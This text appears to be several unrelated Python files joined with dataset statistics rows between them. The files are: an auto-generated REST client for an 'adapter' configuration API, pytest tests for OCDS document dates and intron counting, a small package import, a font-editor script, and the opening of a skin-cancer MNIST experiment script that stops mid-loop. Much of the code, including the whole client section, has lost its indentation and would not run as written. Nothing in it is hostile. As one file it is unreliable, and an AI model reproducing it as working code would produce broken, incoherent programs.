:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterUnitList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_adapter_unit_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/Units',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterUnitList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_adapter_config_policy(self, moid, adapter_config_policy,
**kwargs): # noqa: E501
"""Update a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_adapter_config_policy(moid, adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_adapter_config_policy_with_http_info(
moid, adapter_config_policy, **kwargs) # noqa: E501
def patch_adapter_config_policy_with_http_info(self, moid,
adapter_config_policy,
**kwargs): # noqa: E501
"""Update a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_adapter_config_policy_with_http_info(moid, adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'adapter_config_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method patch_adapter_config_policy" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `patch_adapter_config_policy`"
) # noqa: E501
# verify the required parameter 'adapter_config_policy' is set
if self.api_client.client_side_validation and (
'adapter_config_policy' not in local_var_params
or # noqa: E501
local_var_params['adapter_config_policy'] is None
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `adapter_config_policy` when calling `patch_adapter_config_policy`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'adapter_config_policy' in local_var_params:
body_params = local_var_params['adapter_config_policy']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies/{Moid}',
'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_adapter_config_policy(self, moid, adapter_config_policy,
**kwargs): # noqa: E501
"""Update a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_adapter_config_policy(moid, adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_adapter_config_policy_with_http_info(
moid, adapter_config_policy, **kwargs) # noqa: E501
def update_adapter_config_policy_with_http_info(self, moid,
adapter_config_policy,
**kwargs): # noqa: E501
"""Update a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_adapter_config_policy_with_http_info(moid, adapter_config_policy, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'adapter_config_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method update_adapter_config_policy" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `update_adapter_config_policy`"
) # noqa: E501
# verify the required parameter 'adapter_config_policy' is set
if self.api_client.client_side_validation and (
'adapter_config_policy' not in local_var_params
or # noqa: E501
local_var_params['adapter_config_policy'] is None
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `adapter_config_policy` when calling `update_adapter_config_policy`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'adapter_config_policy' in local_var_params:
body_params = local_var_params['adapter_config_policy']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies/{Moid}',
'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 62.910117 | 1,389 | 0.653274 | 16,983 | 139,283 | 5.186716 | 0.025378 | 0.035238 | 0.056581 | 0.015258 | 0.975217 | 0.974445 | 0.974309 | 0.973344 | 0.971812 | 0.970858 | 0 | 0.011076 | 0.283042 | 139,283 | 2,213 | 1,390 | 62.938545 | 0.871019 | 0.570924 | 0 | 0.885988 | 0 | 0 | 0.179473 | 0.07155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028721 | false | 0 | 0.004352 | 0 | 0.061793 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a43ecc4ef639c2c0439665694da6fda90aa38bd7 | 8,048 | py | Python | tests/compiled_release/coherent/test_documents_dates.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | 1 | 2021-07-21T15:23:22.000Z | 2021-07-21T15:23:22.000Z | tests/compiled_release/coherent/test_documents_dates.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | 40 | 2021-06-29T23:53:14.000Z | 2022-02-23T20:14:11.000Z | tests/compiled_release/coherent/test_documents_dates.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | null | null | null | from contracting_process.resource_level.coherent.documents_dates import calculate
def test_undefined():
empty_result = calculate({})
assert type(empty_result) == dict
assert empty_result["result"] is None
assert empty_result["application_count"] is None
assert empty_result["pass_count"] is None
assert empty_result["meta"] == {"reason": "insufficient data for check"}
item_ok = {
"date": "2019-12-31T00:00:00Z",
"planning": {
"documents": [
{
"datePublished": "2014-12-31T00:00:00Z",
"dateModified": "2015-12-31T00:00:00Z",
},
{
"datePublished": "2014-12-31T00:00:00Z",
"dateModified": "2015-12-31T00:00:00Z",
},
]
},
"tender": {
"documents": [
{
"datePublished": "2014-12-31T00:00:00Z",
"dateModified": "2015-12-31T00:00:00Z",
}
]
},
"awards": [
{
"documents": [
{
"datePublished": "2014-12-31T00:00:00Z",
"dateModified": "2015-12-31T00:00:00Z",
}
]
}
],
"contracts": [
{
"documents": [
{
"datePublished": "2014-12-31T00:00:00Z",
"dateModified": "2015-12-31T00:00:00Z",
}
]
},
{
"implementation": {
"documents": [
{
"datePublished": "2014-12-31T00:00:00Z",
"dateModified": "2015-12-31T00:00:00Z",
}
]
}
},
],
}
def test_ok():
result = calculate(item_ok)
assert type(result) == dict
assert result["result"] is True
assert result["application_count"] == 18
assert result["pass_count"] == 18
assert result["meta"] is None
item_failed = {
"date": "2010-12-31T00:00:00Z",
"planning": {
"documents": [
{
"datePublished": "2030-12-31T00:00:00Z",
"dateModified": "2020-12-31T00:00:00Z",
},
{
"datePublished": "2030-12-31T00:00:00Z",
"dateModified": "2020-12-31T00:00:00Z",
},
]
},
"tender": {
"documents": [
{
"datePublished": "2030-12-31T00:00:00Z",
"dateModified": "2020-12-31T00:00:00Z",
}
]
},
"awards": [
{
"documents": [
{
"datePublished": "2030-12-31T00:00:00Z",
"dateModified": "2020-12-31T00:00:00Z",
}
]
}
],
"contracts": [
{
"documents": [
{
"datePublished": "2030-12-31T00:00:00Z",
"dateModified": "2020-12-31T00:00:00Z",
}
]
},
{
"implementation": {
"documents": [
{
"datePublished": "2030-12-31T00:00:00Z",
"dateModified": "2020-12-31T00:00:00Z",
}
]
}
},
],
}
def test_failed():
result = calculate(item_failed)
assert type(result) == dict
assert result["result"] is False
assert result["application_count"] == 18
assert result["pass_count"] == 0
assert result["meta"] == {
"failed_paths": [
{
"path_1": "planning.documents[0].datePublished",
"path_2": "planning.documents[0].dateModified",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2020-12-31T00:00:00Z",
},
{
"path_1": "planning.documents[0].datePublished",
"path_2": "date",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "planning.documents[0].dateModified",
"path_2": "date",
"value_1": "2020-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "planning.documents[1].datePublished",
"path_2": "planning.documents[1].dateModified",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2020-12-31T00:00:00Z",
},
{
"path_1": "planning.documents[1].datePublished",
"path_2": "date",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "planning.documents[1].dateModified",
"path_2": "date",
"value_1": "2020-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "tender.documents[0].datePublished",
"path_2": "tender.documents[0].dateModified",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2020-12-31T00:00:00Z",
},
{
"path_1": "tender.documents[0].datePublished",
"path_2": "date",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "tender.documents[0].dateModified",
"path_2": "date",
"value_1": "2020-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "awards[0].documents[0].datePublished",
"path_2": "awards[0].documents[0].dateModified",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2020-12-31T00:00:00Z",
},
{
"path_1": "awards[0].documents[0].datePublished",
"path_2": "date",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "awards[0].documents[0].dateModified",
"path_2": "date",
"value_1": "2020-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "contracts[0].documents[0].datePublished",
"path_2": "contracts[0].documents[0].dateModified",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2020-12-31T00:00:00Z",
},
{
"path_1": "contracts[0].documents[0].datePublished",
"path_2": "date",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "contracts[0].documents[0].dateModified",
"path_2": "date",
"value_1": "2020-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "contracts[1].implementation.documents[0].datePublished",
"path_2": "contracts[1].implementation.documents[0].dateModified",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2020-12-31T00:00:00Z",
},
{
"path_1": "contracts[1].implementation.documents[0].datePublished",
"path_2": "date",
"value_1": "2030-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
{
"path_1": "contracts[1].implementation.documents[0].dateModified",
"path_2": "date",
"value_1": "2020-12-31T00:00:00Z",
"value_2": "2010-12-31T00:00:00Z",
},
]
}
| 32.192 | 83 | 0.424702 | 740 | 8,048 | 4.490541 | 0.07973 | 0.130605 | 0.167921 | 0.223894 | 0.893169 | 0.875715 | 0.844719 | 0.811616 | 0.775203 | 0.744508 | 0 | 0.209193 | 0.416128 | 8,048 | 249 | 84 | 32.321285 | 0.497978 | 0 | 0 | 0.468619 | 0 | 0 | 0.411531 | 0.113817 | 0 | 0 | 0 | 0 | 0.062762 | 1 | 0.012552 | false | 0.012552 | 0.004184 | 0 | 0.016736 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f12db36231c76755cc8be454fc58b3d26be0b797 | 5,114 | py | Python | tests/test_intron.py | jareyw/intron | f6ecc35cf98ca111d3affbdddfb4878d999107a6 | [
"Apache-2.0"
] | 2 | 2019-10-12T16:11:21.000Z | 2020-12-10T01:08:18.000Z | tests/test_intron.py | jareyw/intron | f6ecc35cf98ca111d3affbdddfb4878d999107a6 | [
"Apache-2.0"
] | 1 | 2020-04-28T09:52:00.000Z | 2020-04-28T09:52:00.000Z | tests/test_intron.py | jareyw/intron | f6ecc35cf98ca111d3affbdddfb4878d999107a6 | [
"Apache-2.0"
] | 1 | 2019-09-19T21:53:39.000Z | 2019-09-19T21:53:39.000Z | """Test intron."""
from ngs_test_utils import testcase
from intron import (
intronCounter_v2_stranded,
make_conserved_gtf,
make_conserved_intron_gtf,
)
class IntronTestCase(testcase.NgsTestCase):
"""Test intron."""
def setUp(self):
self.outdir = self.get_tmp_dir()
self.pkw = {"is_paired": True, "is_proper_pair": True}
def test_long_gene_removed(self):
gtf = self.make_gtf(
[
dict(
seqname="chr1",
feature="exon",
start=1,
end=100,
strand="+",
transcript_id="NM_1",
gene_id="G1",
),
dict(
seqname="chr1",
feature="exon",
start=2_000_000,
end=2_000_100,
strand="+",
transcript_id="NM_1",
gene_id="G1",
),
]
)
ann1 = self.get_filename(extension="gtf")
make_conserved_gtf.process_gtf(gtf, ann1, source="UCSC")
# Make sure that the long gene is not included.
self.assertEqual(self.tsv_to_list(ann1), [])
def test_intron_ucsc(self):
gtf = self.make_gtf(
[
dict(
seqname="chr1",
feature="exon",
start=99,
end=199,
strand="+",
transcript_id="NM_1",
gene_id="G1",
),
dict(
seqname="chr1",
feature="exon",
start=299,
end=399,
strand="+",
transcript_id="NM_1",
gene_id="G1",
),
]
)
bam = self.make_bam(
chroms=[("chr1", 1000)],
segments=[
dict(
qname="r1",
pos=150,
pnext=350,
cigar=[(0, 75)],
is_read1=True,
is_reverse=True,
**self.pkw,
),
dict(
qname="r1",
pos=350,
pnext=150,
cigar=[(0, 75)],
is_read2=True,
mate_is_reverse=True,
**self.pkw,
),
],
)
ann1 = self.get_filename(extension="gtf")
ann2 = self.get_filename(extension="gtf")
result = self.get_filename(extension="gtf")
make_conserved_gtf.process_gtf(gtf, ann1, source="UCSC")
make_conserved_intron_gtf.process_gtf(ann1, ann2)
intronCounter_v2_stranded.intronCounter(bam, ann2, result)
self.assertEqual(
self.tsv_to_list(result, columns=[3, 4, 9, 10, 11]),
[["200", "299", "1", "1", "5000000.0"]],
)
def test_intron_ensembl(self):
gtf = self.make_gtf(
[
dict(
seqname="1",
feature="exon",
start=99,
end=199,
strand="+",
transcript_id="T1",
gene_id="G1",
gene_biotype="protein_coding",
transcript_support_level="1",
),
dict(
seqname="1",
feature="exon",
start=299,
end=399,
strand="+",
transcript_id="T1",
gene_id="G1",
gene_biotype="protein_coding",
transcript_support_level="1",
),
]
)
bam = self.make_bam(
chroms=[("1", 1000)],
segments=[
dict(
qname="r1",
pos=150,
pnext=350,
cigar=[(0, 75)],
is_read1=True,
is_reverse=True,
**self.pkw,
),
dict(
qname="r1",
pos=350,
pnext=150,
cigar=[(0, 75)],
is_read2=True,
mate_is_reverse=True,
**self.pkw,
),
],
)
ann1 = self.get_filename(extension="gtf")
ann2 = self.get_filename(extension="gtf")
result = self.get_filename(extension="gtf")
make_conserved_gtf.process_gtf(gtf, ann1, source="ENSEMBL")
make_conserved_intron_gtf.process_gtf(ann1, ann2)
intronCounter_v2_stranded.intronCounter(bam, ann2, result)
self.assertEqual(
self.tsv_to_list(result, columns=[3, 4, 9, 10, 11]),
[["200", "299", "1", "1", "5000000.0"]],
)
| 29.732558 | 67 | 0.393039 | 436 | 5,114 | 4.385321 | 0.231651 | 0.029289 | 0.054916 | 0.087866 | 0.811715 | 0.790795 | 0.767259 | 0.752092 | 0.746339 | 0.6841 | 0 | 0.06918 | 0.496871 | 5,114 | 171 | 68 | 29.906433 | 0.673921 | 0.014079 | 0 | 0.776316 | 0 | 0 | 0.042934 | 0 | 0 | 0 | 0 | 0 | 0.019737 | 1 | 0.026316 | false | 0 | 0.013158 | 0 | 0.046053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d0c9a00a3875c5e95a69b4b68ea68fecd733d1b | 114 | py | Python | auctions/auctions/domain/value_objects/__init__.py | Enforcer/clean-architecture-example-1 | a51a2a2a4b8cc38f08305a919b0fa59264a91b20 | [
"MIT"
] | 34 | 2018-02-02T21:42:09.000Z | 2022-01-22T20:19:01.000Z | auctions/auctions/domain/value_objects/__init__.py | Enforcer/clean-architecture-example-1 | a51a2a2a4b8cc38f08305a919b0fa59264a91b20 | [
"MIT"
] | null | null | null | auctions/auctions/domain/value_objects/__init__.py | Enforcer/clean-architecture-example-1 | a51a2a2a4b8cc38f08305a919b0fa59264a91b20 | [
"MIT"
] | 10 | 2018-09-18T23:56:59.000Z | 2020-10-15T15:32:02.000Z | from auctions.domain.value_objects.currency import Currency
from auctions.domain.value_objects.money import Money
| 38 | 59 | 0.877193 | 16 | 114 | 6.125 | 0.5 | 0.244898 | 0.367347 | 0.469388 | 0.612245 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070175 | 114 | 2 | 60 | 57 | 0.924528 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
740b01cc364e534b57fa6a805dbb0f241dfd4c9c | 186 | py | Python | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/outline.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | 2 | 2019-12-18T16:12:07.000Z | 2019-12-21T01:19:23.000Z | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/outline.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | null | null | null | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/outline.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | null | null | null | # [h] outline glyphs dialog
import hTools2.dialogs.glyphs.outline
import importlib
importlib.reload(hTools2.dialogs.glyphs.outline)
hTools2.dialogs.glyphs.outline.outlineGlyphsDialog() | 26.571429 | 52 | 0.83871 | 22 | 186 | 7.090909 | 0.454545 | 0.269231 | 0.384615 | 0.519231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 0.064516 | 186 | 7 | 52 | 26.571429 | 0.87931 | 0.134409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
77e85d495060df17a11e7eb950f1bea5e6f17d02 | 54,201 | py | Python | test/skin_cancer_mnist_tests.py | AndrewRLawrence/dp_gp_lvm | b0d4c776714f22e83de31127fbfbbd511f017dcd | [
"MIT"
] | 1 | 2021-01-17T11:44:36.000Z | 2021-01-17T11:44:36.000Z | test/skin_cancer_mnist_tests.py | AndrewRLawrence/dp_gp_lvm | b0d4c776714f22e83de31127fbfbbd511f017dcd | [
"MIT"
] | 1 | 2020-07-19T20:47:02.000Z | 2020-07-19T20:47:02.000Z | test/skin_cancer_mnist_tests.py | AndrewRLawrence/dp_gp_lvm | b0d4c776714f22e83de31127fbfbbd511f017dcd | [
"MIT"
] | 1 | 2020-07-21T07:13:13.000Z | 2020-07-21T07:13:13.000Z | """
This module tests the various models using the skin cancer MNIST data set.
"""
from src.data_io.skin_cancer_mnist_reader import read_64d_luminance
from src.models.dp_gp_lvm import dp_gp_lvm
from src.models.gaussian_process import bayesian_gp_lvm as bgplvm, manifold_relevance_determination as mrd
from src.utils.constants import ResultKeys, RESULTS_FILE_NAME, DATA_PATH
from src.utils.types import NP_DTYPE
import src.visualisation.plotters as vis
from itertools import combinations
import matplotlib.pyplot as plot
import numpy as np
from os.path import isfile
from sklearn.preprocessing import StandardScaler, MinMaxScaler
import tensorflow as tf
from time import time
if __name__ == '__main__':
# Train model. Model/optimisation parameters. Using values from elros as larger ones use too much GPU memory.
num_samples = 100
num_inducing_points = 35
num_latent_dimensions = 15
truncation_level = 20
train_iter = 5000
learning_rate = 0.01
# Read original data.
image_data, labels = read_64d_luminance(DATA_PATH + 'skin_cancer_mnist/')
# Loop through each unique pair of labels to create training data sets.
for label_1, label_2 in combinations(np.unique(labels), 2):
# Define file path for results.
dataset_str = 'skin_cancer_mnist_{}_{}'.format(label_1, label_2)
bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
dataset=dataset_str)
mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
dataset=dataset_str)
# mrd_fully_independent_results_file = RESULTS_FILE_NAME.format(model='mrd_fully_independent',
# dataset=dataset_str)
gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
dataset=dataset_str)
# gpdp_mask_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm_mask_64',
# dataset=dataset_str)
